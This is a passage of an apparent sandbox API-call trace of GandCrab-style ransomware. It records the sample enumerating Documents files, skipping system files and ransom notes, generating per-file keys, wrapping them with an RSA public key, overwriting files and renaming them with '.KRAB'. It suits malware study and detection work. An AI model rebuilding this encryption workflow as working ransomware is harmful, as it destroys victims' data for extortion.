[0089.487] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.488] CloseHandle (hObject=0x43c) returned 1 [0089.488] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.488] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\BO-IIf.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\bo-iif.rtf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\BO-IIf.rtf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\bo-iif.rtf.krab")) returned 1 [0089.489] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.489] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0089.489] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0089.489] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0089.489] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\d2ca4a08d2ca4dee3d.lock" [0089.489] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.490] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 103 [0089.490] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\d2ca4a08d2ca4dee3d.lock") returned 98 [0089.490] lstrlenW (lpString=".lock") returned 5 [0089.490] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.490] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0089.490] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.491] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.491] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0089.491] lstrcmpW (lpString1="iFVCZz67.pptx", lpString2=".") returned 1 [0089.491] lstrcmpW (lpString1="iFVCZz67.pptx", lpString2="..") returned 1 [0089.491] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\", lpString2="iFVCZz67.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\iFVCZz67.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\iFVCZz67.pptx" [0089.491] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.491] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\iFVCZz67.pptx.KRAB") returned 93 [0089.492] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\iFVCZz67.pptx") returned 88 [0089.492] lstrlenW (lpString=".pptx") returned 5 [0089.492] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.492] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pptx ") returned 6 [0089.492] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.492] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\iFVCZz67.pptx") returned 88 [0089.492] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\iFVCZz67.pptx") returned 88 [0089.492] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="desktop.ini") returned 1 [0089.492] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="autorun.inf") returned 1 [0089.492] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="ntuser.dat") returned -1 [0089.492] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="iconcache.db") returned 1 [0089.492] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="bootsect.bak") returned 1 [0089.492] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="boot.ini") returned 1 [0089.493] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="ntuser.dat.log") returned -1 [0089.493] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="thumbs.db") returned -1 [0089.493] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="KRAB-DECRYPT.html") returned -1 [0089.493] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.493] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.493] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="ntldr") returned -1 [0089.493] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="NTDETECT.COM") returned -1 [0089.493] lstrcmpiW (lpString1="iFVCZz67.pptx", lpString2="Bootfont.bin") returned 1 [0089.493] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.493] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010820) returned 1 [0089.494] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.495] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.495] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.495] CryptGenRandom (in: hProv=0x1010820, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0089.495] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0089.495] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.496] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011898) returned 1 [0089.497] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.498] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.498] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.498] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0089.498] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0089.498] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.498] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10110a0) returned 1 [0089.500] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10234f8) returned 1 [0089.500] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0089.500] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0089.500] GetLastError () returned 0x0 [0089.500] CryptDestroyKey (hKey=0x10234f8) returned 1 [0089.500] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0089.500] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011018) returned 1 [0089.502] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10234f8) returned 1 [0089.502] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0089.502] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0089.502] GetLastError () returned 0x0 [0089.502] CryptDestroyKey (hKey=0x10234f8) returned 1 [0089.502] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0089.503] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\iFVCZz67.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\ifvczz67.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0089.503] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.504] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.504] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x7568, lpOverlapped=0x0) returned 1 [0089.522] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff8a98, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.522] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x7568, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x7568, lpOverlapped=0x0) returned 1 [0089.522] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0089.522] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.527] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.527] CloseHandle (hObject=0x43c) returned 1 [0089.527] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.528] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\iFVCZz67.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\ifvczz67.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\iFVCZz67.pptx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\ifvczz67.pptx.krab")) returned 1 [0089.528] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.529] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0089.529] lstrcmpW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2=".") returned 1 [0089.529] lstrcmpW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="..") returned 1 [0089.529] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\", lpString2="J0G7-1c_z-PnUIV947jB.odp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\J0G7-1c_z-PnUIV947jB.odp") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\J0G7-1c_z-PnUIV947jB.odp" [0089.529] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.529] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\J0G7-1c_z-PnUIV947jB.odp.KRAB") returned 104 [0089.529] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\J0G7-1c_z-PnUIV947jB.odp") returned 99 [0089.529] lstrlenW (lpString=".odp") returned 4 [0089.529] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.530] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".odp ") returned 5 [0089.530] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.530] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\J0G7-1c_z-PnUIV947jB.odp") returned 99 [0089.530] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\J0G7-1c_z-PnUIV947jB.odp") returned 99 [0089.530] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="desktop.ini") returned 1 [0089.530] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="autorun.inf") returned 1 [0089.530] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="ntuser.dat") returned -1 [0089.530] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="iconcache.db") returned 1 [0089.530] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="bootsect.bak") returned 1 [0089.530] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="boot.ini") returned 1 [0089.530] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="ntuser.dat.log") returned -1 [0089.531] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="thumbs.db") returned -1 [0089.531] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="KRAB-DECRYPT.html") returned -1 [0089.531] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.531] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.531] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="ntldr") returned -1 [0089.531] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="NTDETECT.COM") returned -1 [0089.531] lstrcmpiW (lpString1="J0G7-1c_z-PnUIV947jB.odp", lpString2="Bootfont.bin") returned 1 [0089.531] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.531] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10113d0) returned 1 [0089.533] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.533] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.533] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.533] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0089.533] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0089.534] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.534] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10113d0) returned 1 [0089.536] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.536] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.536] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.536] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0089.537] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0089.537] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.537] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011458) returned 1 [0089.573] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023278) returned 1 [0089.573] CryptGetKeyParam (in: hKey=0x1023278, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0089.573] CryptEncrypt (in: hKey=0x1023278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0089.574] GetLastError () returned 0x0 [0089.574] CryptDestroyKey (hKey=0x1023278) returned 1 [0089.574] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0089.574] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010f08) returned 1 [0089.575] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023278) returned 1 [0089.575] CryptGetKeyParam (in: hKey=0x1023278, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0089.575] CryptEncrypt (in: hKey=0x1023278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0089.576] GetLastError () returned 0x0 [0089.576] CryptDestroyKey (hKey=0x1023278) returned 1 [0089.576] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0089.576] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\J0G7-1c_z-PnUIV947jB.odp" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\j0g7-1c_z-pnuiv947jb.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0089.576] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.577] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.577] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0xeb04, lpOverlapped=0x0) returned 1 [0089.591] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff14fc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.592] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xeb04, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0xeb04, lpOverlapped=0x0) returned 1 [0089.592] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0089.592] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.596] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.597] CloseHandle (hObject=0x43c) returned 1 [0089.597] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.597] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\J0G7-1c_z-PnUIV947jB.odp" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\j0g7-1c_z-pnuiv947jb.odp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\J0G7-1c_z-PnUIV947jB.odp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\j0g7-1c_z-pnuiv947jb.odp.krab")) returned 1 [0089.598] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.599] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0089.599] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0089.599] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0089.599] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\KRAB-DECRYPT.txt" [0089.599] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.599] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\KRAB-DECRYPT.txt.KRAB") returned 96 [0089.599] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\KRAB-DECRYPT.txt") returned 91 [0089.599] lstrlenW (lpString=".txt") returned 4 [0089.599] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.599] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0089.600] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.600] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\KRAB-DECRYPT.txt") returned 91 [0089.600] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\KRAB-DECRYPT.txt") returned 91 [0089.600] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0089.600] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0089.600] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0089.600] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0089.600] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0089.600] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0089.600] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0089.600] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0089.600] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0089.600] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0089.601] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.601] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0089.601] lstrcmpW (lpString1="N3LNN9Eg", lpString2=".") returned 1 [0089.601] lstrcmpW (lpString1="N3LNN9Eg", lpString2="..") returned 1 [0089.601] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\", lpString2="N3LNN9Eg" | out: 